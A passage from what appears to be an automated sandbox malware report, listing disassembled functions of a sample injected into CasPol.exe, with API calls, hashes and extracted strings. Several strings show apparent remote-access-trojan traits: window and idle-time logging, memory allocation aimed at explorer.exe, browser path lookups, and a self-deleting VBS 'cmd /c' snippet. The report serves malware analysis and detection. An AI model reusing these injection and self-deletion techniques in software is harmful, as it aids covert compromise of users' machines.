                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                                                                                                                  Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                                                                  • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                                                                  • API String ID: 1913171305-390638927
                                                                                                                                                                                                                                  • Opcode ID: c70024ecc2ebcd820d5e95e9d7cee7980915c74394fb7974cfdf2e55154b81ef
                                                                                                                                                                                                                                  • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c70024ecc2ebcd820d5e95e9d7cee7980915c74394fb7974cfdf2e55154b81ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                                                                  Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                  • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                                                                                                                                  Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                  • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                                                                                                                  Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                                                                  • API String ID: 911427763-3954389425
                                                                                                                                                                                                                                  • Opcode ID: a6bb1a4c0eb89d76b1de77a61ede453c0c742a8fd7e953c2b0cd8e17b02ef629
                                                                                                                                                                                                                                  • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6bb1a4c0eb89d76b1de77a61ede453c0c742a8fd7e953c2b0cd8e17b02ef629
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                                                                                                                                  Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 65535$udp
                                                                                                                                                                                                                                  • API String ID: 0-1267037602
                                                                                                                                                                                                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                  • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                                                                                                  Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043946A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439471
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2441525078-0
                                                                                                                                                                                                                                  • Opcode ID: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                  • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                                                                                                  Function 100064B0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 249COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,-00000002), ref: 100065F7
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,00000006), ref: 10006793
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                                                  • API String ID: 1174141254-3709686828
                                                                                                                                                                                                                                  • Opcode ID: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                  • Instruction ID: cd525ab1337c3ee21bd27d398b55dee76c9cea0ea90567e5fc089a1fee8f1736
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D917E74D20218AAEF00DFA4DC45BEEBBBAFF48744F204119F406E7295EB75A905CB51
                                                                                                                                                                                                                                  Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                  • Opcode ID: d200e41620427d9473e98f7f60e1a7380e62b4687472ae1eb451e98f2392ac7f
                                                                                                                                                                                                                                  • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d200e41620427d9473e98f7f60e1a7380e62b4687472ae1eb451e98f2392ac7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                                                                                                  Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                  • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                                                                  • API String ID: 1107811701-2245803885
                                                                                                                                                                                                                                  • Opcode ID: 6f6c61d22ea9a6171061744b6423a29f13106e4a3f0e6f12fbfb9163f51caaf1
                                                                                                                                                                                                                                  • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f6c61d22ea9a6171061744b6423a29f13106e4a3f0e6f12fbfb9163f51caaf1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                  Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                                                                  • API String ID: 2050909247-4145329354
                                                                                                                                                                                                                                  • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                                                                  • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                                                                                                                  Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                                                  • Opcode ID: eac2432222f4f4afde1f7cf6c47f526356f61b0485a7c29ded5a18ae6df5b8f9
                                                                                                                                                                                                                                  • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eac2432222f4f4afde1f7cf6c47f526356f61b0485a7c29ded5a18ae6df5b8f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                                                                                                  Function 045759D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045759EA
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045759F6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A01
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A0C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A17
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A22
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A38
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A43
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A51
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: a2c8a0a42dbcadfb9ecc7fda1d48ed9a0fa2dec840fb4e5ac87f45e78dc85303
                                                                                                                                                                                                                                  • Instruction ID: 6d5b5fdcac47386bb0652a001ca36f523a9c75e11e60484c7234ed1d84d17ece
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2c8a0a42dbcadfb9ecc7fda1d48ed9a0fa2dec840fb4e5ac87f45e78dc85303
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F411D77A12014DFFEB11EF54E840CDD3FA5FF84294B1540B4B9094B521EA31EA50AB84
                                                                                                                                                                                                                                  Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446DDF
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446DEB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446DF6
